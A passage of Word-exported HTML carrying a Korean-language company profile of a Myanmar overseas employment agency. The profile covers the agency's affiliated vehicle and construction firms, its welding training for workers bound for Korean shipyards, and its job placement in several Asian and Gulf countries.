style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취득하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">활동을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는자매</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업들과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">협력하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">차량</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수입허가를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청했고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각종</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관광</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업 및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">운송에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사용되는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">다양한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">유형의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">버스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기계를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직접</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">구매 판매하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">종사해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명 이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">쌍둥이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부처로부터</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">건설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">작업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">동안</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는 현재에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">한국</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소들에 일하고 싶은 미얀마</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각지에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">온</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">소수민족</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">형제들을 교통통신부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산하</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike)</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소에 트레이너들와 함께 훌령한 기능공이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">되도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">용접수업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있으며</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업할 수 있게 취업들을 연계시키고 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">두바이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">말레이시아</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싱가포</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본 같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국가에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하기를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">원하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun 